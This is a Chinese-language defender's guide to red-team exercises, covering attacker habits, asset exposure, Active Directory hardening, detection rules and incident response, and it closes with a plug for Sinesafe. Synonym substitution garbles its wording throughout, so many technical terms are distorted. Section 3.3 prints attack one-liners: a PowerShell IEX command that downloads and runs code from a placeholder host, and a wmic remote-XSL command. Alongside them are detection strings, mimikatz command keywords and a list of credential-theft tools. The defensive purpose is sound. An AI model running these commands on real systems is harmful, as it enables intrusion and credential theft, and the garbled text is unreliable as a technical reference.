近来我们Sinesafe列入的几家机构的渗入测试戍守方防护设计评价复查，部份戍守方缺少对进击者的准确认知，进击者的手腕已比较高明了，不扫描，不落地，污染日记等都很提高了。同时也要准确认知敌手：攻防练习训练中，进击者并不是无所不能，他们面临着和防备方一样的题目：时刻紧，任务重。所以进击者的进击目标，进击手腕也是有迹可循的,亲信知彼才战无不胜。

渗入测试

一、知彼

进击者也是讲本钱的，因而戍守方最好的战略是：做的比其他戍守方好一点点即可。好一点的寄义：不在初级题目上出错（弱暗码、互联网运用长途RCE、治理背景暴露、主要效劳器未打补丁等）。关于“时刻紧、任务重”的戍守方来讲，建筑稳如泰山的防地明显意味着大本钱投入，以及最紧缺的时刻，因而本文不会四平八稳，只挑选性价比高值得疾速投入的平安步伐和人人分享。

进击者平常：目标明白、步骤清楚、掌握本钱、反检测，反清算、三流分立。

目标明白：进击者只进击得分项，和必要途径（外网进口，内网立足点），对这些目标采用高等级手腕，会隐蔽操纵；对非必要途径顺道掌握下来的效劳器，并不怕被发明，用起来比较随便，以至主动制作噪音，滋扰戍守方。

步骤清楚：信息收集-掌握进口-横向挪动-保持权限-进击目标体系。每一步都是典范操纵和教科书式手腕。

掌握本钱：

优先进击高权限账号，如治理员，目标体系担任人账号；

优先进击运维/平安职员账号和终端，这些人每每有效劳器root账号，平安装备治理员账号，能够进一步深切掌握；

优先进击集合管控装备，如域控，集合身份认证体系，终端治理体系，攻下单体系即取得公司内大部份体系的权限；

优先进击基本装备，如DNS，DHCP，邮件体系，学问分享平台，oa体系，工单体系；这些体系有内置高权限账号，或能够协助进击者隐蔽陈迹。或Git/SVN等开辟源代码治理效劳器，经由过程代码审计发明运用0day破绽。

反检测，反清算：

样本隐蔽手艺（白应用（带微软署名的顺序实行未署名的黑dll），样本不落地实行（从网上加载样本，只运转在内存，不落盘不惊扰杀软））；

疾速散布（进击者会将进击包做成自动化东西，下降人力投入，疾速掌握一批有破绽发效劳器）；

住手日记外发，日记消灭（剧本优先住手罕见日记外发东西；同时有开源自动化东西来挟制日记发生的历程，使得体系不发生日记；运用完后删除access.log等日记）；

削减扫描，经由过程剖析日记、剖析设置文件、治理员泉源IP等体式格局来猎取内网的其他机械IP信息，而不是扫描。

点击增加图片形貌（最多60个字）

三流分立：

扫描流：用来大批量扫描内网存活IP和破绽，扫描源一般不被进击者注重，被消灭也不会影响到进击设计，高水平进击者一般运用扫描行动来疏散戍守方精神。

数据流：用来向外网大批传输非症结数据，一般是有互联网权限的终端或效劳器（终端较多），很少有隧道行动或扫描行动，经由过程简朴的https，sftp体式格局传输数据

掌握流：用于接收和通报远控指令的效劳器，进击者最注重的装备，运用起来最为郑重，和远控中间举行交换，经常使用组件cobaltstrike， empire；有隧道行动，且数据传输量很少，会衔接若干个IP和域名（防止外网封禁），传输肯定加密，不运用自署名证书。

在本次攻防实战练习预备阶段，进击方预备了几十个C2域名。

二、亲信亲信，主假如晓得戍守方戍守区域内的资产信息，减少暴出面。准绳以下：

不必的体系，该下的下，该停息的停息。不必的功用，该下的下，该停息的停息。（日常平凡就应该如许措置惩罚，而不是战时）

该作废接见的作废，能限定接见局限的限定接见局限。

在用的，搞清楚功用，双流（数据流和运维流）谁用，有无风险，可否一键措置。

减少暴出面 1.按资产所属纬度梳理

互联网资产、分支机构资产、子公司资产、外联公司资产、公有云资产、开辟商、外包商。

轻易无视的：

公有云资产，因为有的营业部门和分支机构公有云要求都不经由IT部门，上面却放了大批营业数据。

开辟商/外包商的资产。开辟商/外包商平常给甲方外包开辟信息体系，开辟商/外包商公司内部也会自建Git/SVN等源代码治理效劳器，存有已交付给甲方的信息体系源码，而开辟商/外包商的源码体系治理平安才能和甲方比拟能够就差几个量级了。效果就是：经由过程取得的源码，发明体系运用0day，从而掌握甲方已上线信息体系。

减少暴出面 2.按资产属性梳理

迥殊关注资产的平安属性：中间件或框架（版本）、开放在公网API接口（迥殊是未下线的老接口）、治理背景开放在公网、高危功用（文件上传点、短信验证码、重置暗码、文件下载）、长途接入点（VPN）、特权账户（运用治理特权账户、运用衔接账户、体系治理特权账户、能够修正账户权限的账户、备份账户、高管层账户）。

每个平安属性都是血的履历。

减少暴出面 3.无视点

一切内部文档效劳器上（含OA、邮件体系、jira、wiki、学问库等）敏感信息清算或限定接见权限，不要有：收集拓扑、平安防护设计和布置位置、种种暗码；

资产治理平台上，蜜罐不要叫蜜罐、平安装备IP要隐蔽；

种种口令：弱口令、默许口令、已泄漏口令。

每个无视点都是眼泪的结晶。

平安资产治理，更多内容列入：平安资产治理中轻易被无视的几点

三、防护症结点

临战前，再想依据大而全的梳理一遍，几无能够，最好就是把防护症结点过一遍，牢记都现实看一遍，不要置信他人的反应。

3.1 平安断绝

渗入测试绕过

从实战来看，收集层的接见掌握被证实是最有用的（进击者很难绕过去），不要置信运用层掌握。收集层接见掌握属于基本架构平安，这是最有用最主要的，悉数平安防护的基本。

接见掌握战略准绳：明细许可，默许谢绝。

从内网去互联网的接见掌握

办公终端：除个别协定没法限定目标IP外，其他协定悉数限定。特别接见需求，疾速开通。有条件的斟酌：终端不能直接接见互联网，须要接见互联网的两种处理设计：别的分派一台上网终端、假造浏览器

办公效劳器：特别接见需求开通，默许谢绝

临盆网：临盆网终端制止上互联网、效劳器特别接见需求开通，默许谢绝

2.互联网接见内网：对互联网供应效劳的效劳器必须在DMZ，和内网断绝。

3.主要体系的接见掌握战略

基本装备如AD、邮件体系的接见掌握。

别小视基本装备ACL接见掌握，这是匹敌运用和体系破绽的最低本钱和最有用步伐。破绽屡见不鲜，惟有ACL接见掌握药效持久，强烈引荐。

终端平安管控、自动化运维体系等集合掌握体系背景登录限定接见泉源。（优先运用收集接见掌握、其次运用体系层限定、搭配运用运用层限定）

3.2 AD防护

预备阶段

2.加固阶段

匹敌权限提拔：对域账号举行权限DACL梳理，加固高权限账号

检测高权限账号能够用bloodhound黑客东西监测，也能够经由过程System Internal Tools的ADExplorer来举行检测：

1）修正暗码（发起在练习前邻近时刻举行修正）

2）调解权限和分组，依据账号的归属人的权限举行调账，作废非域管账号的敏感权限。

3）修正分组内的不合适的职员账号。

4）敏感账号不许可委派。

5）敏感账号不许可作废Kerberos预鉴权。

6）敏感账号的暗码强度符合规定。

7）具有直接域管或许间接域管权限（比方能够修正Domain Admins的账号就具有间接域管权限）的账号的运动举行报备轨制，练习时期未经许可不得举行任何操纵，包含登录等等。

8）办公机和终端练习前悉数重启，消弭敏感账号凭证保存。

9）效劳器登录检察相干凭证，假如有删除或经由过程注销来删除效劳器上保存的凭证。

10）参照https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory设置域治理员权限。

匹敌进击者运用MS14-068，MS17-010进击域：从旧到新顺次装置DC上的windows补丁。

匹敌进击者运用ExchangeSSRF破绽：从旧到新顺次装置Exchange上的windows补丁。

匹敌LDAP relay进击：在域控上设置LDAP enforce signing。

匹敌LDAP relay和SSRF进击：在域控上设置LDAPS channel binding。

匹敌LLMNR/NBT Poisoning进击：封闭域内WPAD效劳。

3.检测阶段

渗入测试检测阶段

准绳：若域不平安，最好修复设计是重装。

检测敏感同享目次接见：接见了AD效劳器的非正常同享目次 （非SYSVOL文件夹）

检测mimikatz一系列进击行动：

Mimikatz经由过程sysmon历程来举行检测，罕见症结字有“gentilkiwi (Benjamin DELPY)”（公司名称）、

其他症结字：kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton

检测Kerberos弱加密体式格局：非AES加密体式格局的Kerberos单子加密要求相称可疑

检测异常注册表变动和dump：DSRMAdminLogonBehavior

变动AdminSDHolder

导出HKLM\SAM内容

导出HKLM\SYSTEM内容

导出HKLM\SECURITY内容

检测ntdsutil滥用：运用了ntdsutil的敏感参数activate instance ntds ；运用了ntdsutil的敏感参数set dsrm password

检测SID history变动：账号到场SID History胜利、失利

检测lazagne暗码提取东西：特性 lazagne

进击者喜好用的其他东西：

procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

3.3 主机防护（终端和效劳器）匹敌

进击者在尝试掌握终端和效劳器时，为了绕过通例的杀毒软件，一般会运用一些免杀手腕。而某些免杀手腕（如白应用，样本不落地实行）因为异常稳固和高效，更是遭到宽大进击者的喜爱。

1.Powershell IEX组建下载实行.(文件在内存实行，不落硬盘)

应用代码示例：powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:81/aa'))">

监测特性："IEX” AND “(New-Object Net.WebClient).DownloadString“

2.Windows体系白文件应用(wmic.exe

应用代码示例：cmd/c wmic os get /format:”\\x.x.x.x\1.xsl”&start/wait notepad

监测特性："wmic os get" AND "/format"3.Windows体系白文件应用(csc.exe)

应用代码示例：

"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

监测特性："csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows体系白文件应用(msiexec.exe)

特性：被动实行背景实行的参数，有肯定误报率。请自行研讨，不再举例。

5.检测certutil白应用

特性：罕见绕防火墙运用的参数。请自行研讨，不再举例。

6.检测经由过程url.dll来举行不落地实行

请自行研讨，不再举例。

3.4 账户和权限匹敌

高权限一概清算，限定运用局限，每次运用后确认。

运用权限经由过程日记剖析检测滥用。

关注备份账户、可修正权限账户的运用。

终端24小时重启一次。（匹敌终端权限抓取类进击）

3.5 霎时殒命

霎时殒命有两种体式格局：途径打穿、体系打穿。

3.5.1 途径打穿

直接从未想过（未设防）的途径进击过来。邮件是掌握终端第一挑选进口，详细防护可拜见《企业平安竖立指南：金融行业平安架构与手艺时刻》第16章：邮件平安。

边沿网包含无线和自助终端，包含：打卡机、自动售卖机、会议室装备、ATM机、排队机等。限定无线和自助终端收集和内网接见。

限定分支机构、外联公司等收集和总部的收集接见。

不要置信理论上不能全通，但现实上存在全通内网的体系。（死于方便性）

3.5.2 体系打穿

体系打穿，都是血泪史。因为我们老是忘记了这些最大的风险源。优先进击中间化的体系和跨两网的体系，包含终端平安管控掌握台（掌握台平安防护才能很弱）、运维治理体系/Zabbix/Nagios/碉堡机等、单点登录SSO体系、AD运动目次；

优先进击基本装备：DNS、DHCP、邮件体系、研发效劳器SVN/Git；

高代价终端：

收集治理员：终端内有收集拓扑和ACL掌握战略，以至能够修正接见掌握；

平安治理员：有平安防护设计和检测体系、告警体系登录权限，许多平安体系做了登录泉源限定，绕过手腕之一就是掌握平安治理员的终端，同时抓取平安治理员账户暗码，进击者一石二鸟；

研发个人终端/运维个人终端：高代价数据；

内网扫描器：收集权限较大，哪都能去。

代码效劳器：代码数据代价比较高。私有协定开辟的运用顺序，源码要保护好，有履历进击团队带代码审计妙技成员，经由过程源码审计发明运用0day

3.6 轻易出题目标点

互联网运用框架RCE

运用和中间件治理背景暴露

VPN：未启用双要素，或存在未启用双要素的部份用户

测试环境的测试体系未实时打补丁、弱暗码

经由过程邮件进口掌握办公终端

跨两网的装备

效劳器暗码同质题目

社工

四、事中和预先

前面分享了许多防护和检测的事项，但戍守方到了这个阶段，更主要的是斟酌一下事中的种种过载信息的研判和疾速应急措置步伐。

我们打内部攻防练习的时刻，最大的搅扰是决议计划和措置。

4.1 过载信息研判

有用高速的决议计划机制，什么权限局限内的由什么人决议计划，这是受权。

什么岗亭（人）担任什么，这是职责分别。比方谁担任跟踪每条告警信息到Closed状况？谁担任断网？谁担任样本剖析？谁担任陷落主机排查？谁担任溯源途径？谁担任纪录？谁担任报告？等等。

4.2 疾速应急措置

4.2.1 硬件和后勤

大的作战室，包容悉数戍守部队；

好的白板（最好电子的），便于梳理进击途径；

预备好零食和每日三餐、行军床。

4.2.2 主要信息同步

已陷落的IP清单（黑名单），同步给一切戍守方；

是不是C2域名疾速推断，注重真假难辨的域名。

4.2.3 种种应急措置步伐

断网：疾速断网的操纵范例和自动化东西

钓饵

暂时增加ACL和FW划定规矩

下线营业：和营业方竖立通顺的沟通机制和疾速的决议计划机制

假如陷落（疑似）主机，决议计划用于钓饵，务必确保钓饵的风险可控，万一延续应用钓饵在内网横向挪动，再举行限定就困难了。

注重膂力分派，高水平进击者一般运用扫描行动等体式格局来疏散戍守方精神。

4.3 渗入测试复检

攻防实战练习后的总结革新提拔，才是终究目标。

4.3.1 防护薄缺点和革新步伐

平安团队

合作团队

厂商和第三方

平安团队不好推进的事情，不好讲的话，要不到的资本，都能够在这里提出来。

应急措置薄缺点和革新步伐，落实到人、设计和资本中，才是务虚的。

4.3.3 资本不足，要资本

平安运营是必由之路，拜见 金融业企业平安竖立之路

7*24小时的平安运营，既然进击敌手是7*24小时的，为何平安运营不是呢？

4.3.4 必要的治理层报告

五、注重事项

不要影响营业。攻防练习前的加固，须要妥帖评价对营业可用性影响，攻防练习中的应急措置，须要妥帖评价对营业可用性影响,毕竟，营业可用性才是老大，平安不是，摆正心态和位置,假如对渗入测试有主意的朋侪能够找专业的网站平安公司来措置惩罚处理，国内引荐Sinesafe,绿盟,启明星斗,等等的网站平安公司。